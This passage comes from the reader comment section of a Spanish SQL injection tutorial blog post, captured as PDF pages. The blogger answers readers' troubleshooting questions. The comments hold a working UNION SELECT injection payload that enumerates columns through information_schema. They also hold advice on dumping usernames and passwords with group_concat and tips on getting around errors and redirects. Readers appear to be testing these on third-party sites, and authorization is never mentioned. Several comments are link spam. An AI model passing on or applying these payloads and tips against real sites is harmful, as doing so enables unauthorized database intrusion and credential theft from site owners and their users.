a.columns+where+table_name=char(85,83,69,82,95,80,82,73,86,73 76,69,71,6

9,83)--

Intenta con eso.

OverNet at martes, octubre 30, 2012 10:30:00 p. m.

aaaaa ya entedi, gracias por resolverme mi duda

Anónimo at miércoles, octubre 31, 2012 3:47:00 p. m.

oye cuando empiezo la inyección me aparece esto Warning: mysql_fetch_array()

: supplied argument is not a valid MySQL result resource in /home/content/a/k/a/

akanet/html/prod_detail.php on line 144

y por mas que continué la inyección sigue apareciendo el mismo mensaje osea

no cambia, que puedo hacer?

Anónimo at viernes, noviembre 02, 2012 10:51:00 p. m.

oye amigo cuando le pongo la comilla no pasa nada, pero cuando quiero busca

r las tablas me dice esto: No está autorizado para ver este recurso Necesita con

ectarse.

significa que no es vulnerable o existe otro método para hacerle la inyección

Anónimo at viernes, noviembre 02, 2012 11:07:00 p. m.

-230+union+select+1,group_concat(column_name),3+from+information_schem

a.columns+where+table_name=char(85,83,69,82,95,80,82,73,86,73,76,69,71,6

9,83)--

Page 13: Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica.

13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..

http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 13/16

Asunto arreglado falto ponerle una coma.

OverNet at viernes, noviembre 02, 2012 11:59:00 p. m.

se puede hackear este tipo de sitios:

index.php?option=com_content&task=view&id=345&Itemid=265

es que cuando le pongo la comilla no pasa nada, y cuando sigo con el siguient

e paso(-230+union+select+1--) me sale un error que dice:

no esta autorizado para ver esta informacion, necesita conectarse.

hay otro metodo?

o no es vulnerable?

Anónimo at viernes, noviembre 09, 2012 10:25:00 p. m.

No creo que sea vulnerable, el cms es joomla y en algunas versiones antiguas

si son vulnerables a SQLi. Pero en tu caso, no es vulnerable.

OverNet at viernes, noviembre 09, 2012 10:44:00 p. m.

Buen articulo lo explicas todo pero tengo un problema, al intentar sacar el usuar

io y la password del final, la pagina no me muestra la password completa es de

cir muestra el usuario y la pass: group_concat(usuario,0x3a,password) pero la

pagina tiene una fuente muy grande y se limita a mostrarla toda, así que me po

drías decir que función se emplea aquí? :) Salu2

Max_Hcz_Julieinstein at martes, noviembre 20, 2012 5:29:00 p. m.

Muy Bueno el paso a paso, muchas gracias.

Novato at lunes, diciembre 10, 2012 7:13:00 a. m.

que significa el -203 ?

dgs crew at jueves, diciembre 13, 2012 4:23:00 p. m.

El '-203' el '-' es para dar inicio la inyección, el '203' es el id de la noticia (Esto no

importa, puede ser el 0,1,2,3.. el numero que quieras no afecta en nada en la in

yección)

OverNet at jueves, diciembre 13, 2012 6:58:00 p. m.

Hola ,

Cuando pongo el apostrofe me sale lo siguiente :

Query: SELECT id,catname,password FROM rp_categories WHERE id='1''

Result: You have an error in your SQL syntax; check the manual that correspond

s to your MySQL server version for the right syntax to use near ''1''' at line 1

Database handle: Resource id #6

Y seguidamente pongo en la URL la sentencia que indicas por que como veras

ya tengo el nombre de la tabla y sus columnas , pero solo me redirecciona a la

pagina inicial.

¿Qué puede ser?

Anónimo at miércoles, enero 09, 2013 3:59:00 p. m.

Desactiva Java Script de tu navegador, e intenta.

Page 14: Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica.

13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..

http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 14/16

OverNet at miércoles, enero 09, 2013 9:39:00 p. m.

wowwww you're a genius!!! como aprendiste todo eso!!!? cuanto tiempo tardaste

en aprendertelo?

Anónimo at martes, enero 15, 2013 4:36:00 p. m.

Anónimo, no se necesita aprenderse nada.

Por inercia es necesario saber estos temas para quien esté interesado en prog

ramar su propio sitio en PHP y MySQL de allí se empieza, programando.

OverNet at martes, enero 15, 2013 10:51:00 p. m.

Everyone loves it when people come together and

share opinions. Great blog, stick with it!

Also visit my web-site :: youtube software views

Anónimo at lunes, abril 08, 2013 12:38:00 p. m.

This is the right site for anyone who really wants to find

out about this topic. You realize so much its almost tough

to argue with you (not that I personally will need to…HaHa).

You definitely put a brand new spin on a subject that

has been discussed for ages. Excellent stuff, just wonderful!

Here is my blog; Boost Adfly Earnings Tool

Anónimo at martes, abril 09, 2013 8:18:00 a. m.

Thank you for the good writeup. It in reality used to be a amusement account

it. Look complex to more delivered agreeable from you!

By the way, how can we keep in touch?

My web site ... play minecraft free

Anónimo at domingo, abril 14, 2013 2:16:00 a. m.

Great beat ! I would like to apprentice while you amend your

site, how can i subscribe for a blog site? The account helped me a acceptable d

eal.

I had been a little bit acquainted of this your broadcast provided

bright clear idea

My blog post; play minecraft free

Anónimo at miércoles, abril 17, 2013 8:45:00 a. m.

I like the helpful information you provide on your articles.

I'll bookmark your blog and take a look at again here frequently. I am somewhat

sure I'll learn many new stuff right

right here! Good luck for the next!

Also visit my webpage :: dragonvale the Game

Anónimo at miércoles, abril 17, 2013 2:46:00 p. m.

I like looking through an article that can make men and women think.

Also, thank you for permitting me to comment!

Look into my page - funny facebook status

Page 15: Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica.

13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..

http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 15/16

Entrada más reciente Entrada antigua

Anónimo at jueves, abril 18, 2013 6:05:00 a. m.

hola gran tutorial mi pregunta es se puede sacar user y pass de una pagina qu

e termine en index.php

Saludos

Anónimo at jueves, abril 25, 2013 1:22:00 a. m.

My brother recommended I might like this web site. He was totally right.

This post actually made my day. You cann't imagine simply how much time I had

spent for this info! Thanks!

My homepage :: cityville

Anónimo at domingo, junio 16, 2013 10:19:00 a. m.

When someone writes an paragraph he/she retains the image

of a user in his/her brain that how a user can know it. Therefore that's why this po

st is perfect. Thanks!

Also visit my web page ... download cityville

Anónimo at lunes, junio 17, 2013 6:39:00 a. m.

Saved as a favorite, I like your blog!

Here is my web page ... cheats in dragonvale

Anónimo at martes, junio 18, 2013 12:29:00 p. m.

Enlaces a esta entrada

Crear un enlace

Página principal

© 2014 # Root-Net | Seguridad, Software, Windows, e Informatica... Powered by Blogger.

Designed by Xu.hel, Blogger templates by Blog and Web

PUBLICAR UN COMENTARIO EN LA ENTRADA

Blaaa blaa y + blaa.. escribe las dudas que tengas :D

- No incluyas Correos electrónicos por seguridad propia.

- No SPAM/Flood.

- Se borrará cualquier comentario ofensivo, racista o vulgar.

Introduce tu comentario...

Comentar como: Cuenta de Google

Publicar

Vista previa

Page 16: Tutorial de Inyección SQL Para Principiantes _ # Root-Net _ Seguridad, Software, Windows, e Informatica.

13/2/2014 Tutorial de Inyección SQL para principiantes | # Root-Net | Seguridad, Software, Windows, e Informatica..

http://root-network.blogspot.com/2011/07/tutorial-de-inyeccion-sql-para.html 16/16